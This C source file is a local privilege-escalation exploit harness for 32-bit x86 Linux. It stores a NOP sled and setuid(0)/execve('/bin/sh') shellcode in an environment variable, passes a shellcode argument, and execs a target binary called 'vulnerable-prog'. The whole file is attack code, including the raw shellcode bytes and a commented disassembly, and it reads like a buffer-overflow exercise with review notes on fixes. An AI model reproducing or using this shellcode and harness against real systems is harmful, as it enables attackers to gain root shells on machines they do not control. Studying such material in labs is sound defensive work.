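#include <stdio.h>
#include <string.h>
#include <unistd.h>

/*
 * Exploit harness: builds an environment block holding a NOP sled followed
 * by a small execve("/bin/sh") shellcode, builds an argv[1] payload, and
 * execve()s the target binary with both.
 *
 * Disassembly of SHELLCODE (32-bit x86 Linux, offsets are byte offsets
 * into the payload):
 *
 *    0: 31 c0             xor  eax,eax
 *    2: 31 db             xor  ebx,ebx            ; ebx = 0
 *    4: b0 d5             mov  al,0xd5            ; eax = 213
 *    6: cd 80             int  0x80               ; syscall 213 with ebx=0
 *                                                ;   (setuid32(0) on i386 --
 *                                                ;   confirm against the
 *                                                ;   target's syscall table)
 *    8: eb 18             jmp  0x22               ; jmp/call/pop trick to get
 *    a: 5e                pop  esi                ;   esi = &"/bin/sh"
 *    b: 89 76 08          mov  [esi+0x8],esi      ; argv[0] = "/bin/sh"
 *    e: 31 c0             xor  eax,eax
 *   10: 88 46 07          mov  [esi+0x7],al       ; NUL-terminate "/bin/sh"
 *   13: 89 46 0c          mov  [esi+0xc],eax      ; argv[1] = NULL (also envp)
 *   16: b0 0b             mov  al,0xb             ; eax = 11 = execve
 *   18: 89 f3             mov  ebx,esi            ; ebx = path
 *   1a: 8d 4e 08          lea  ecx,[esi+0x8]      ; ecx = argv
 *   1d: 8d 56 0c          lea  edx,[esi+0xc]      ; edx = envp (empty)
 *   20: cd 80             int  0x80
 *   22: e8 e3 ff ff ff    call 0xa                ; pushes 0x27 = &"/bin/sh"
 *   27:                   .ascii "/bin/sh"
 *
 * The payload contains no 0x00 byte (the terminator after "/bin/sh" and the
 * argv array are written at run time, at esi+7 .. esi+0xf), so it survives
 * strcpy()-style copies. Because of those run-time stores the shellcode
 * needs 0x27 + 0x10 = 55 writable bytes starting at its first byte, not
 * just its 46 bytes of text; see the slack left after it in envbuf below.
 */
#define SHELLCODE "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"

/* Length of the payload text, excluding the literal's trailing NUL. */
#define SHELLCODE_LEN (sizeof SHELLCODE - 1)

/* Prefix that turns the block into a "NAME=value" environment entry. */
#define ENV_PREFIX "SHELLCODE="
#define ENV_PREFIX_LEN (sizeof ENV_PREFIX - 1)

/* Size of the environment entry: a large NOP sled so that an imprecise
 * guess of its address still lands on a NOP and slides into the shellcode. */
#define ENV_BLOCK_SIZE 127000

/* Size of the argv[1] payload handed to the target. The shellcode is also
 * placed this far from the end of envbuf, which leaves ENV_BLOCK_SIZE -
 * OVF_BUF_SIZE bytes of slack after it for the stores the shellcode makes
 * past its own text. */
#define OVF_BUF_SIZE 84

_Static_assert(SHELLCODE_LEN <= OVF_BUF_SIZE,
               "shellcode must fit in the region reserved for it");
_Static_assert(ENV_PREFIX_LEN + OVF_BUF_SIZE <= ENV_BLOCK_SIZE,
               "environment block too small for prefix + shellcode region");

/*
 * Builds the environment block and argv[1] payload and execs the target.
 *
 * Returns only if execve() fails (exit status 1); on success the process
 * image is replaced. Note that execve() does not search PATH, so the
 * target is resolved relative to the current working directory.
 *
 * Both buffers live on the stack (~124 KiB); fine under the usual 8 MiB
 * limit, but keep it in mind if the harness is ever run with a tight
 * RLIMIT_STACK.
 */
int main(void)
{
    char envbuf[ENV_BLOCK_SIZE + 1];
    char ovfbuf[OVF_BUF_SIZE + 1];
    char *argv[3];
    char *envp[2];

    /* A NUL inside the payload would truncate both the environment entry
     * and argv[1]; catch that at run time rather than debugging a
     * half-copied shellcode. */
    if (strlen(SHELLCODE) != SHELLCODE_LEN) {
        fputs("shellcode contains a NUL byte\n", stderr);
        return 1;
    }

    /* Environment entry: "SHELLCODE=" + NOP sled + shellcode + NOP slack.
     * Fill the entire tail with NOPs first so that no byte of the entry
     * is left uninitialized (the original only filled up to the shellcode
     * start, leaving the bytes after the shellcode indeterminate). */
    memcpy(envbuf, ENV_PREFIX, ENV_PREFIX_LEN);
    memset(envbuf + ENV_PREFIX_LEN, 0x90, ENV_BLOCK_SIZE - ENV_PREFIX_LEN);
    memcpy(envbuf + ENV_BLOCK_SIZE - OVF_BUF_SIZE, SHELLCODE, SHELLCODE_LEN);
    envbuf[ENV_BLOCK_SIZE] = '\0';

    /* argv[1]: the shellcode bytes, NUL-terminated. Copy only what the
     * literal actually holds -- the original indexed SHELLCODE[0..83] out
     * of a 47-byte literal, which is an out-of-bounds read. Since the
     * literal's own NUL stopped the string at SHELLCODE_LEN bytes anyway,
     * the string the target receives is unchanged.
     * NOTE(review): at 46 bytes this argument cannot overflow an
     * OVF_BUF_SIZE-byte buffer; confirm what argv[1] is meant to carry. */
    memcpy(ovfbuf, SHELLCODE, SHELLCODE_LEN);
    ovfbuf[SHELLCODE_LEN] = '\0';

    argv[0] = "vulnerable-prog"; /* "vulnerable"; */
    argv[1] = ovfbuf;
    argv[2] = NULL;

    /* Hand the prepared block to the target as its only environment
     * entry. The original left envp empty, so the block it built was
     * never passed to the child. */
    envp[0] = envbuf;
    envp[1] = NULL;

    execve(argv[0], argv, envp);

    /* execve() only returns on failure. */
    perror("execve");
    return 1;
}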